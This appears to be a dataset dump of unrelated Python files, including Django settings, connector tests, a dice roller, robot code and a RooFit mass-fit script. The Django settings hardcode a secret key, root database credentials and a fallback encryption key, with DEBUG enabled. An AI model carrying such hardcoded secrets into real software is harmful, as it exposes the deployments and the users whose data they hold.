text stringlengths 38 1.54M |
|---|
import sys
if __name__ == '__main__':
print "Usage:", sys.argv[0], " [input] [output] [known? (y/n)]"
output = open(sys.argv[2], 'w')
if sys.argv[3] == "y": # known (source & train)
with open(sys.argv[1], 'r') as file:
line = file.readline()
while line:
l = line.split()
output.write("%s %s:1 %d:1\n" % (l[2], l[0], int(l[1]) + 50000))
line = file.readline()
else: # unknown (test)
with open(sys.argv[1], 'r') as file:
line = file.readline()
while line:
l = line.split()
output.write("0 %s:1 %d:1\n" % (l[0], int(l[1]) + 50000))
line = file.readline()
|
from django.contrib import admin

from . import models

# Register every ad-related model with the default admin site, one by one
# (equivalent to passing the tuple to a single register() call).
for _model in (models.Category, models.CarAd, models.Owner, models.Offer):
    admin.site.register(_model)
|
from searchEngine.models import WordFromIndexedPage, IndexedPage
from collections import defaultdict
import utilities.tselogging as logging
from utilities.util import bulk_save

logger = logging.getLogger("tse.se.example")

# Python 2 example script (uses raw_input and list-returning dict.values()).
# Example executions.
# Say "google" is an already saved WordFromIndexedPage Instance, and we
# get these words from nltk clean html
list_of_words = ["new", "google", "googl3", "google4"]

# Database queries (eg, save(), get, filter) etc do disk-IO op,
# hence are slower than mem access,
# we could cache stuffs, and batch save all objects at the end :)
# with a function like:
cache = {} # word<String> : wordL<WordFromIndexedPage>
cacheWordLocation = defaultdict(list)  # word<String> : list of offsets

# it's ok, we do this just once...-ish
url = IndexedPage.objects.get(pk="http://www.google.com")

# Build one unsaved WordFromIndexedPage per distinct word; record its offsets.
# NOTE(review): the offset 32 is a fixed placeholder for every word — confirm.
for word in list_of_words:
    if word not in cache:
        cache[word] = WordFromIndexedPage(indexedPage=url, word=word)
    cacheWordLocation[word].append(32)

# Attach the collected offsets to each cached model.
for key in cache.keys():
    cache[key].set_offsets(cacheWordLocation[key])

# DO NOT SAVE() each time ;)
all_models_to_save = cache.values()
# you might not wanna forget this dude. question: why mush URL be the
# *last model*?
all_models_to_save.append(url)
bulk_save(all_models_to_save)

raw_input("Inspect database (F5=refresh),\
then press enter to undo this example's effects are removed")

# Undo the example: delete the rows created above, then restore a single
# known-good entry for "google".
for update in cache.values():
    update.delete()
# NOTE(review): kwarg here is indexed_page=, but the constructor above used
# indexedPage= — confirm which is the actual model field name.
WordFromIndexedPage(
    indexed_page=url,
    word="google",
    offsets_in_indexedPage=str(
        [1])).save()
|
from itertools import *
from random import *
def sum_list_memo(summation, num):
    """Return all lists of `num` digits (0-9) that sum to `summation`.

    Digits are appended least-significant-last by the recursion, so each
    result list is ordered [deepest digit, ..., outermost digit].
    Returns [] when no combination exists (num <= 0, negative summation,
    or a single digit that would have to exceed 9).
    """
    if num <= 0:
        return []
    if summation < 0 or (num == 1 and summation >= 10):
        return []
    if num == 1:
        # 0 <= summation <= 9 here: exactly one single-digit solution.
        return [[summation]]
    answer = []
    for digit in range(10):
        # Recursive results are freshly built, so appending in place is safe.
        for tail in sum_list_memo(summation - digit, num - 1):
            tail.append(digit)
            answer.append(tail)
    return answer
def sum_list_memo_2(summation, num, r):
    """Memoized variant of sum_list_memo.

    `r` is a (summation+1) x (num+1) table; r[s][n] caches the list of
    n-digit combinations summing to s, with None meaning "not yet computed".
    The original code tested `if r[s][n]:`, which treats a cached empty
    result ([]) as missing and recomputes it every time — fixed to compare
    against None so empty results are cached too.
    """
    if r[summation][num] is not None:
        return r[summation][num]
    if num <= 0:
        r[summation][num] = []
    elif num == 1 and summation >= 10:
        r[summation][num] = []
    elif num == 1:
        # 0 <= summation <= 9: single-digit base case.
        r[summation][num] = [[summation]]
    else:
        answer = []
        for digit in range(10):
            # Guard negative remainders before recursing (they index r badly).
            if summation - digit < 0:
                tails = []
            else:
                tails = sum_list_memo_2(summation - digit, num - 1, r)
            for tail in tails:
                # Copy before appending: cached lists must not be mutated.
                combo = list(tail)
                combo.append(digit)
                answer.append(combo)
        r[summation][num] = answer
    return r[summation][num]
def sum_list(summation, num):
    """Convenience wrapper: allocate an empty memo table and delegate."""
    memo = [[None] * (num + 1) for _ in range(summation + 1)]
    return sum_list_memo_2(summation, num, memo)
def random_index():
    """Draw 32 distinct indices from 0..79, in the random order drawn."""
    pool = list(range(80))
    picks = []
    for _ in range(32):
        j = randint(0, len(pool) - 1)
        # pop(j) removes exactly the chosen element (values are unique),
        # matching the original remove(a[k]) behaviour and RNG sequence.
        picks.append(pool.pop(j))
    return picks
def random_list():
    """Return the digits 0-9 in a uniformly random order.

    The original version printed the pool, index, and pick on every
    iteration — debug output removed.
    """
    pool = list(range(10))
    out = []
    while pool:
        j = randint(0, len(pool) - 1)
        out.append(pool.pop(j))
    return out
# a = sum_list(10,8)
# Demo: print one random permutation of the digits 0-9.
print(random_list())
# b = sum_list_memo(2,3)
# print(a)
# print(b)
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from airbyte_cdk.logger import AirbyteLogger
from airbyte_cdk.models import (
AirbyteStream,
ConfiguredAirbyteCatalog,
ConfiguredAirbyteStream,
ConnectorSpecification,
DestinationSyncMode,
SyncMode,
)
from source_instagram.source import SourceInstagram
logger = AirbyteLogger()
def test_check_connection_ok(api, some_config):
    """A valid config must connect successfully, with no error message."""
    is_ok, message = SourceInstagram().check_connection(logger, config=some_config)
    assert is_ok
    assert not message
def test_check_connection_empty_config(api):
    """An empty config must be rejected with an explanatory error."""
    is_ok, message = SourceInstagram().check_connection(logger, config={})
    assert not is_ok
    assert message
def test_check_connection_invalid_config(api, some_config):
    """A config missing the required start_date must fail the check."""
    some_config.pop("start_date")
    is_ok, message = SourceInstagram().check_connection(logger, config=some_config)
    assert not is_ok
    assert message
def test_check_connection_exception(api, config):
    """An API exception must surface as a failed check with an error message."""
    api.side_effect = RuntimeError("Something went wrong!")
    is_ok, message = SourceInstagram().check_connection(logger, config=config)
    assert not is_ok
    assert message
def test_streams(api, config):
    """The connector must expose exactly 7 streams."""
    assert len(SourceInstagram().streams(config)) == 7
def test_spec():
    """spec() must return a ConnectorSpecification instance."""
    assert isinstance(SourceInstagram().spec(), ConnectorSpecification)
def test_read(config):
    """read() over a single full-refresh 'users' stream should yield output."""
    users_stream = ConfiguredAirbyteStream(
        stream=AirbyteStream(name="users", json_schema={}, supported_sync_modes=[SyncMode.full_refresh]),
        sync_mode=SyncMode.full_refresh,
        destination_sync_mode=DestinationSyncMode.overwrite,
    )
    catalog = ConfiguredAirbyteCatalog(streams=[users_stream])
    assert SourceInstagram().read(logger, config, catalog)
|
import random

if __name__ == "__main__":
    # Interactive dice roller: parses inputs like "3d6" or "1d10+2".
    print('Dice Roller')
    print('''Enter what kind and how many dice to roll. The format is the number of dice, followed by "d",
followed by the number of sides the dice have. You can also add a plus or minus adjustment.
Examples:
3d6 rolls three 6-sided dice
1d10+2 rolls one 10-sided die, and adds 2
2d38-1 rolls two 38-sided die, and subtracts 1
QUIT quits the program
''')
    while True:
        # Keep prompting until the input at least contains 'd' or is 'quit'.
        while True:
            userInput = input('> ').lower()
            if 'd' in userInput or userInput == 'quit':
                break
            print('Invalid input.')
        if userInput == 'quit':
            print('Thanks for playing!')
            break
        # All parsing lives inside the try: the original converted the dice
        # count outside it, so inputs like "xd6" or "d6" crashed the program.
        try:
            numOfRolls, userInput = userInput.split('d')
            numOfRolls = int(numOfRolls)
            if '+' in userInput:
                numOfSide, bonusPoint = list(map(int, userInput.split('+')))
            elif '-' in userInput:
                numOfSide, bonusPoint = list(map(int, userInput.split('-')))
                bonusPoint *= -1
            else:
                numOfSide = int(userInput)
                bonusPoint = 0
        except ValueError:
            print('Invalid input. Enter something like "3d6" or "1d10+2".')
            continue
        # randint(1, 0) would raise for 0-sided dice; reject up front.
        if numOfRolls < 1 or numOfSide < 1:
            print('Invalid input. Dice count and sides must be at least 1.')
            continue
        diceRolls = [random.randint(1, numOfSide) for _ in range(numOfRolls)]
        totalValue = sum(diceRolls) + bonusPoint
        # Print the total followed by the individual rolls and any bonus.
        print(totalValue, end=' ')
        print('(', end='')
        print(', '.join(map(str, diceRolls)), end='')
        if bonusPoint != 0:
            print(f', +{bonusPoint}' if bonusPoint >
                  0 else f', {bonusPoint}', end='')
        print(')')
|
#!/usr/bin/env python
import os

from camstrument_client import CamstrumentClient


def _int_env(name, default):
    """Read env var `name` as an int, falling back to `default` when unset
    or unparsable.  os.getenv always returns strings, so the original code
    passed e.g. PORT='10001' (str) whenever the variable was set."""
    try:
        return int(os.getenv(name, default))
    except (TypeError, ValueError):
        return default


# Camera may be a numeric device index or a device path; convert only digits.
_cam = os.getenv('CAMERA', 0)
CAMERA = int(_cam) if isinstance(_cam, str) and _cam.isdigit() else _cam
IP = os.getenv('IP', '127.0.0.1')
PORT = _int_env('PORT', 10001)
GRID_COUNT = _int_env('GRID_COUNT', 8)
THRESHOLD = _int_env('THRESHOLD', 20)
DEBUG = os.getenv('DEBUG', 'False') == 'True'


def main():
    """Build a client from the environment-derived settings and run it."""
    c = CamstrumentClient(CAMERA, IP, PORT, GRID_COUNT, THRESHOLD, DEBUG)
    c.run()


if __name__ == '__main__':
    main()
|
"""
Django settings for setting project.
Generated by 'django-admin startproject' using Django 2.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'tk*gi)vg#&9ogg!oco$7_2r7zt)*(h-$oj-0hwkj$%s38!7gk@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'rest_framework',
'qdiff',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'setting.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'setting.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'qdiff',
'USER': 'root',
"PASSWORD": 'root',
'HOST': 'localhost',
'PORT': '3306',
'OPTIONS': {
'init_command': 'SET sql_mode=\'STRICT_TRANS_TABLES\'',
},
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, "static/")
# logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': "[%(asctime)s] %(levelname)s "
"[%(name)s:%(lineno)s] %(message)s",
'datefmt': "%d/%b/%Y %H:%M:%S"
},
},
'handlers': {
'logfile': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(BASE_DIR, 'dev.log'),
'formatter': 'standard',
},
# 'console': {
# 'level': 'INFO',
# 'class': 'logging.StreamHandler',
# 'formatter': 'standard'
# },
},
'loggers': {
'django': {
'handlers': ['logfile'],
'propagate': True,
'level': 'WARN',
},
# 'django.db.backends': {
# 'handlers': ['logfile'],
# 'level': 'DEBUG',
# 'propagate': False,
# },
}
}
# qDiff
GENERATED_TABLE_PREFIX = 'GEN'
CONFLICT_TABLE_NAME_FORMAT = '{prefix}_TASK_{id}_{position}'
DEFAULT_DATA_LENGTH = 80
SOURCE_TYPE_DATABASE_PREFIX = 'database:'
SOURCE_TYPE_CSV_PREFIX = 'csv:'
SOURCE_TYPE_PREFIXES = [
SOURCE_TYPE_DATABASE_PREFIX, SOURCE_TYPE_CSV_PREFIX]
SOURCE_REQUIRED_FIELDS = ['ENGINE', 'NAME']
SCHEMA_INFER_LIMIT = 300
SCHEMA_INFER_CONFIDENCE = 1.00
SCHEMA_CSV_MISSING_VALUES = ['', 'None', 'null', None, 'NULL']
SCHEMA_DATABASE_MISSING_VALUES = ['', 'None', 'null', None, 'NULL']
RESULT_SPLITTING_TOKEN = '<@#$>'
FILE_UPLOAD_FOLDER = 'data'
REPORT_FILENAME_FORMAT = 'TASK_{task_id}_{report_type}'
REPORT_FOLDER = 'gen_reports'
TEMP_FOLDER = 'tmp'
# qDiff report
# if field based difference of given field is over this number
# the rest will not be save into report object
REPORT_MAX_DIFF_PAIR = 80
# CELERY
CELERY_BROKER_URL = 'amqp://guest:guest@localhost//'
#: Only add pickle to this list if your broker is secured
#: from unwanted access (see userguide/security.html)
CELERY_ACCEPT_CONTENT = ['json']
CELERY_RESULT_BACKEND = 'db+sqlite:///results.sqlite'
CELERY_TASK_SERIALIZER = 'json'
# DRF
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
]
}
# Key for encryption configs
FILE_ENCRYPTION_KEY = os.environ.get(
'FIELD_ENCRYPTION_KEY',
b'rUbndCP4bma9IgiunLeNzwO2mKQVCjjPr-qAQXHf__E=')
|
import pandas as pd
import os

# Python 2 driver script: runs gen_results.py in each corpus directory via
# execfile() and collects the homogeneity counters that script defines as
# globals (homogcount, mainlyhomogcount, randomhomogcount,
# randommainlyhomogcount).  One (4-tuple) row is appended per corpus.
finalres=[]
print
print "KDD Cup"
print "-------"
os.chdir('2016KDDCupSelected')
execfile('gen_results.py')
finalres.append((homogcount,mainlyhomogcount,randomhomogcount,randommainlyhomogcount))
print
print "Sustainable Energy"
print "------------------"
os.chdir('../SustainableEnergy')
execfile('gen_results.py')
finalres.append((homogcount,mainlyhomogcount,randomhomogcount,randommainlyhomogcount))
print
print "Mechanical Engineering"
print "-----------------------"
os.chdir('../MechanicalEngineering')
execfile('gen_results.py')
finalres.append((homogcount,mainlyhomogcount,randomhomogcount,randommainlyhomogcount))
print
print "Cardiology"
print "-----------------------"
os.chdir('../Cardiology')
execfile('gen_results.py')
finalres.append((homogcount,mainlyhomogcount,randomhomogcount,randommainlyhomogcount))
os.chdir('..')
# Assemble the per-corpus rows into a labelled DataFrame.
finalres=pd.DataFrame(finalres)
finalres.columns=['#Homogeneous','#Mainly-Homogeneous','#Randomized homogeneous','#Randomized mostly homogeneous']
finalres.index=['KDD','Sustainable Energy','Mechanical Engineering','Cardiology']
|
# VEX IQ Python-Project
import sys
import vexiq

#region config
motor_1 = vexiq.Motor(1)
color_2 = vexiq.ColorSensor(2) # hue
#endregion config

# Reference 4-channel raw-color tuples measured for each target object.
red = (48,40,44,128)
blue = (11,27,130,137)

color_2.led_on()
print("reading")
# NOTE(review): sys.sleep() is the Robot Mesh VEX IQ runtime's sleep — it
# does not exist in standard CPython; confirm this runs on that platform.
sys.sleep(3)
# Baseline reading taken at startup (printed for calibration/debugging).
initial = color_2.raw_color()
print("initial:", initial)
def close(color):
    """Return True when the sensor's current raw color is within the
    per-channel thresholds of the reference tuple `color`."""
    thresholds = (20, 25, 50, 25)
    measurement = color_2.raw_color()
    for expected, actual, limit in zip(color, measurement, thresholds):
        if abs(expected - actual) > limit:
            return False
    print("hit!", measurement)
    return True
print("watching...")
while True:
if close(blue):
motor_1.run(100, 100, True)
sys.sleep(1)
motor_1.run(-10, 100, True)
sys.sleep(2)
if close(red):
motor_1.run(-100, 100, True)
sys.sleep(1)
motor_1.run(10, 100, True)
sys.sleep(2)
|
#!/usr/bin/env python3
"""Sum trailing integers grouped by leading name, reading lines from stdin.

Each line is '<name words...> <integer>'; output is one '<name> <total>'
line per distinct name (insertion order).
"""
import sys

sums = {}
for line in sys.stdin:
    parts = line.split()
    # Skip blank lines: the original crashed on parts[-1] / int('') here.
    if not parts:
        continue
    num = int(parts[-1])
    name = ' '.join(parts[:-1])
    sums[name] = sums.get(name, 0) + num

for name in sums:
    print(name, sums[name])
|
How to run the file?
1.Download the fresh_tomatoes file and save this file with an extension .py.
2.Then download the media file and save this file also with an extension .py.
3.Type the code required for movie trailer and save
this file as entertainment_center with an extension .py.
4. Open the entertainment_center.py file with IDLE.
5.Run the file.
6.The browser will open and you could see the web page running in it.
This is a website created using python.
The home page will show a list of movie names. When we click on a movie,
the trailer of that particular movie will start playing in a popup.
|
import argparse

parser = argparse.ArgumentParser(description="")
# parser.add_argument("inputfile" , help = "Path to the input ROOT file")
parser.add_argument("dimusel" , help = "Define if keep or remove dimuon resonances. You can choose: keepPsiP, keepJpsi, rejectPsi, keepPsi")
parser.add_argument("year" , help = "choose among:2016,2017,2018", default = '2018')
args = parser.parse_args()

'''
code to fit the B0 mass distribution:
- unbinned fit
- possibility to apply cuts on the dimuon mass [B0&Psi cut in RunI analysis] (e.g. to exclude the Jpsi mass region, or the psi) via the parameter dimusel
'''

import os, sys, inspect
from os import path
# Make user-local python2.7 packages and the parent directory importable.
sys.path.insert(0, os.environ['HOME'] + '/.local/lib/python2.7/site-packages')
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0,parentdir)

import ROOT
from ROOT import gSystem
# Batch mode: no GUI windows while saving canvases.
ROOT.gROOT.SetBatch(True)
gSystem.Load('libRooFit')
gSystem.Load('../utils/func_roofit/libRooDoubleCBFast')
from ROOT import RooFit, RooRealVar, RooDataSet, RooArgList, RooTreeData, RooArgSet, RooAddPdf, RooFormulaVar
from ROOT import RooGaussian, RooExponential, RooChebychev, RooProdPdf, RooCBShape, TFile, RooPolynomial
import sys, math, pdb
from uncertainties import ufloat

# Silence RooFit below ERROR (level 4) and raise the minimiser call budget.
ROOT.RooMsgService.instance().setGlobalKillBelow(4)
ROOT.Math.MinimizerOptions.SetDefaultMaxFunctionCalls(50000)
def _getFittedVar(varName, w=None):
    """Wrap a fitted variable as a ufloat (value +/- error).

    If a workspace `w` is given, `varName` is looked up by name in it;
    otherwise `varName` is assumed to already be the RooRealVar itself.
    """
    source = w.var(varName) if w is not None else varName
    return ufloat(source.getVal(), source.getError())
def _goodFit(r):
return (r.status()==0 and r.covQual() == 3)
def _accFit(r):
return (r.status()==4 and r.covQual() == 3)
def _writeFitStatus(r):
    """Build a TLatex label summarising the fit status and covariance quality."""
    status_label = "GOOD" if r.status() == 0 else "NOT CONV"
    label = ROOT.TLatex(.16, .7, "fit status: " + status_label + ", covQ = %s" % r.covQual())
    label.SetNDC()
    label.SetTextSize(0.033)
    label.SetTextFont(42)
    return label
def _writeChi2(chi2):
    """Build a TLatex label showing the fit chi2 value."""
    label = ROOT.TLatex(.16, .8, "fit #chi^{2}: %.1f "%chi2)
    label.SetNDC()
    label.SetTextSize(0.033)
    label.SetTextFont(42)
    return label
def _constrainVar(var, nsigma):
    """Build a Gaussian constraint pdf for `var`, centred on its fitted value
    with width nsigma * (fit error).

    The central value and error are read from the module-level MC workspace
    `w` via _getFittedVar (looked up by var's name).
    """
    constr = _getFittedVar(var.GetName(), w)
    gauss_constr = RooGaussian( "c_%s" %var.GetName() ,
                                "c_%s" %var.GetName() ,
                                var ,
                                ROOT.RooFit.RooConst( constr.n ),
                                ROOT.RooFit.RooConst( nsigma*constr.s )
                                )
    print 'constraining var', var.GetName(), ': ', constr.n , ' with uncertainty ' , nsigma*constr.s
    return gauss_constr
sys.path.append("../utils")
from utils.utils import *
from utils.fit_functions import *
nbins = 60
nSigma_psiRej = 3.
cut_base = applyB0PsiCut(args.dimusel, nSigma_psiRej)
## uncertainty on fRT
frt_sigma = frt_sigmas[args.year]
q2binning = [
1,
2,
4.3,
6,
8.68,
10.09,
12.86,
14.18,
16,
# 19,
]
from collections import OrderedDict
fitStats = OrderedDict()
covStats = OrderedDict()
chi2s = OrderedDict()
def fitData(fulldata, ibin, w):
cut = cut_base + '&& (mumuMass*mumuMass > %s && mumuMass*mumuMass < %s)'%(q2binning[ibin], q2binning[ibin+1])
data = fulldata.reduce(RooArgSet(tagged_mass,mumuMass,mumuMassE), cut)
nrt_mc = _getFittedVar("nRT_%s"%ibin, w)
nwt_mc = _getFittedVar("nWT_%s"%ibin, w)
fraction = nrt_mc / (nrt_mc + nwt_mc)
print 'mistag fraction on MC for bin ', ibin , ' : ' , fraction.n , '+/-', fraction.s
### creating RT component
w.loadSnapshot("reference_fit_RT_%s"%ibin)
mean_rt = w.var("mean^{RT%s}"%ibin)
sigma_rt1 = w.var("#sigma_{RT1}^{%s}"%ibin)
sigma_rt2 = RooRealVar()
alpha_rt1 = RooRealVar()
alpha_rt2 = RooRealVar()
n_rt1 = RooRealVar()
n_rt2 = RooRealVar()
f1rt = RooRealVar()
## double cb fast
if ibin < 4:
alpha_rt1 = w.var("#alpha_{RT1}^{%s}"%ibin)
alpha_rt2 = w.var("#alpha_{RT2}^{%s}"%ibin)
n_rt1 = w.var("n_{RT1}^{%s}"%ibin)
n_rt2 = w.var("n_{RT2}^{%s}"%ibin)
## double cb old
else:
sigma_rt2 = w.var("#sigma_{RT2}^{%s}"%ibin)
alpha_rt1 = w.var("#alpha_{RT1}^{%s}"%ibin)
alpha_rt2 = w.var("#alpha_{RT2}^{%s}"%ibin)
n_rt1 = w.var("n_{RT1}^{%s}"%ibin)
n_rt2 = w.var("n_{RT2}^{%s}"%ibin)
f1rt = w.var("f^{RT%s}"%ibin)
theRTgauss = w.pdf("doublecb_RT%s"%ibin)
### creating WT component
w.loadSnapshot("reference_fit_WT_%s"%ibin)
mean_wt = w.var("mean_{WT}^{%s}"%ibin)
sigma_wt = w.var("#sigma_{WT1}^{%s}"%ibin)
alpha_wt1 = w.var("#alpha_{WT1}^{%s}"%ibin)
alpha_wt2 = w.var("#alpha_{WT2}^{%s}"%ibin)
n_wt1 = w.var("n_{WT1}^{%s}"%ibin)
n_wt2 = w.var("n_{WT2}^{%s}"%ibin)
theWTgauss = w.pdf("doublecb_%s"%ibin)
### creating variable for the difference between the two peaks
deltaPeaks = RooFormulaVar("deltaPeaks%s"%ibin, "@0 - @1", RooArgList(mean_rt, mean_wt))
frt = RooRealVar ("F_{RT}%s"%ibin , "frt" , fraction.n , 0, 1)
signalFunction = RooAddPdf ("sumgaus%s"%ibin , "rt+wt" , RooArgList(theRTgauss,theWTgauss), RooArgList(frt))
### now create background parametrization
slope = RooRealVar ("slope_%s"%ibin , "slope" , 0.5, -10, 10);
bkg_exp = RooExponential("bkg_exp%s"%ibin , "exponential" , slope, tagged_mass );
pol_c1 = RooRealVar ("p1_%s"%ibin , "coeff x^0 term" , 0.5, -10, 10);
pol_c2 = RooRealVar ("p2_%s"%ibin , "coeff x^1 term" , 0.5, -10, 10);
bkg_pol = RooPolynomial ("bkg_pol%s"%ibin , "2nd order pol" , tagged_mass, RooArgList(pol_c1, pol_c2));
fsig = RooRealVar("fsig%s"%ibin , "fsig" , 0.9, 0, 1);
# nsig = RooRealVar("Yield%s"%ibin , "signal frac" , 1000, 0, 10000);
# nbkg = RooRealVar("nbkg%s"%ibin , "bkg fraction" , 1000, 0, 500000);
nsig = RooRealVar("Yield" , "signal frac" , 600000, 0, 5000000);
nbkg = RooRealVar("nbkg" , "bkg fraction" , 100000, 0, 2000000);
# if ibin==4:
# nsig.setRange(500000,1500000)
# nsig.setVal(900000)
# nbkg.setRange(80000,1000000)
# nbkg.setVal(100000)
### creating constraints
c_vars = RooArgSet()
c_pdfs = RooArgSet()
c_sigma_rt1 = _constrainVar(sigma_rt1, 1)
c_alpha_rt1 = _constrainVar(alpha_rt1, 1)
c_alpha_rt2 = _constrainVar(alpha_rt2, 1)
c_n_rt1 = _constrainVar(n_rt1, 1)
c_n_rt2 = _constrainVar(n_rt2, 1)
c_sigma_wt = _constrainVar(sigma_wt, 1)
c_alpha_wt1 = _constrainVar(alpha_wt1, 1)
c_alpha_wt2 = _constrainVar(alpha_wt2, 1)
c_n_wt1 = _constrainVar(n_wt1, 1)
c_n_wt2 = _constrainVar(n_wt2, 1)
if ibin < 4:
c_pdfs = RooArgSet(c_sigma_rt1, c_alpha_rt1, c_alpha_rt2, c_n_rt1, c_n_rt2)
c_vars = RooArgSet(sigma_rt1, alpha_rt1, alpha_rt2, n_rt1, n_rt2)
else:
c_sigma_rt2 = _constrainVar(sigma_rt2, 1)
c_pdfs = RooArgSet(c_sigma_rt1, c_sigma_rt2, c_alpha_rt1, c_alpha_rt2, c_n_rt1, c_n_rt2)
c_vars = RooArgSet( sigma_rt1, sigma_rt2, alpha_rt1, alpha_rt2, n_rt1, n_rt2)
c_pdfs.add(c_sigma_wt); c_vars.add(sigma_wt)
c_pdfs.add(c_alpha_wt1); c_vars.add(alpha_wt1)
c_pdfs.add(c_alpha_wt2); c_vars.add(alpha_wt2)
c_pdfs.add(c_n_wt1); c_vars.add(n_wt1)
c_pdfs.add(c_n_wt2); c_vars.add(n_wt2)
c_deltaPeaks = RooGaussian("c_deltaPeaks%s"%ibin , "c_deltaPeaks", deltaPeaks, ROOT.RooFit.RooConst( deltaPeaks.getVal() ),
ROOT.RooFit.RooConst( 0.0005 ) ## value to be checked
)
c_pdfs.add(c_deltaPeaks)
c_vars.add(deltaPeaks)
c_frt = RooGaussian("c_frt%s"%ibin , "c_frt" , frt, ROOT.RooFit.RooConst(fraction.n) , ROOT.RooFit.RooConst(frt_sigma[ibin]) )
c_pdfs.add(c_frt)
c_vars.add(frt)
constr_list = RooArgList(c_pdfs)
constr_list.add(signalFunction)
c_signalFunction = RooProdPdf ("c_signalFunction", "c_signalFunction", constr_list)
# mean = RooRealVar ("mass" , "mean" , B0Mass_, 3, 7, "GeV")
# sigma = RooRealVar ("#sigma_{1}" , "sigma" , 0.028, 0, 10, "GeV")
# signalGauss = RooGaussian("signalGauss" , "signal gauss" , tagged_mass, mean,sigma)
#
# sigma2 = RooRealVar ("#sigma_{2}" , "sigma2" , 0.048, 0, 0.07, "GeV")
# signalGauss2 = RooGaussian("signalGauss2" , "signal gauss2" , tagged_mass, mean,sigma2)
# f1 = RooRealVar ("f1" , "f1" , 0.8 , 0., 1.)
# gaus = RooAddPdf ("gaus" , "gaus1+gaus2" , RooArgList(signalGauss,signalGauss2), RooArgList(f1))
# pol_c1 = RooRealVar ("p1" , "coeff x^0 term", 0.5, -10, 10);
# pol_c2 = RooRealVar ("p2" , "coeff x^1 term", 0.5, -10, 10);
# pol_c3 = RooRealVar ("p3" , "coeff x^2 term", 0.5, -10, 10);
# slope = RooRealVar ("slope" , "slope" , 0.5, -10, 10);
# bkg_exp = RooExponential("bkg_exp" , "exponential" , slope, tagged_mass );
# bkg_pol = RooChebychev("bkg_pol" , "2nd order pol" , tagged_mass, RooArgList(pol_c1,pol_c2));
fitFunction = RooAddPdf ("fitfunction%s"%ibin , "fit function" , RooArgList(c_signalFunction, bkg_exp), RooArgList(nsig, nbkg))
# r = fitFunction.fitTo(data,
# # RooFit.Extended(True),
# RooFit.Range("full"),
# ROOT.RooFit.Constrain(c_vars),
# ROOT.RooFit.Minimizer("Minuit2","migrad"),
# ROOT.RooFit.Hesse(True),
# ROOT.RooFit.Strategy(2),
# ROOT.RooFit.Minos(False),
# )
print 'fit with Hesse strategy 2 done, now Minos'
r = fitFunction.fitTo(data,
RooFit.Extended(True),
RooFit.Save(),
RooFit.Range("full"),
RooFit.Verbose(False),
ROOT.RooFit.Constrain(c_vars),
# ROOT.RooFit.Minimizer("Minuit2","migrad"),
# ROOT.RooFit.Hesse(True),
# ROOT.RooFit.Strategy(2),
# ROOT.RooFit.Minos(False),
)
r.Print()
r.correlationMatrix().Print()
fitStats['data%s'%(ibin)] = r.status()
covStats['data%s'%(ibin)] = r.covQual()
frame = tagged_mass.frame( RooFit.Range("full") )
data.plotOn(frame, RooFit.Binning(nbins), RooFit.MarkerSize(.7))
fitFunction.plotOn(frame, RooFit.NormRange("full"), RooFit.Range("full"))
## evaluate sort of chi2 and save number of RT/WT events
observables = RooArgSet(tagged_mass)
flparams = fitFunction.getParameters(observables)
nparam = int(flparams.selectByAttrib("Constant",ROOT.kFALSE).getSize())
pdfstring = "fitfunction%s_Norm[tagged_mass]_Range[full]_NormRange[full]"%ibin
chi2s['data%s'%ibin] = frame.chiSquare(pdfstring, "h_fulldata", nparam)
frame. addObject(_writeChi2( chi2s['data%s'%ibin] ))
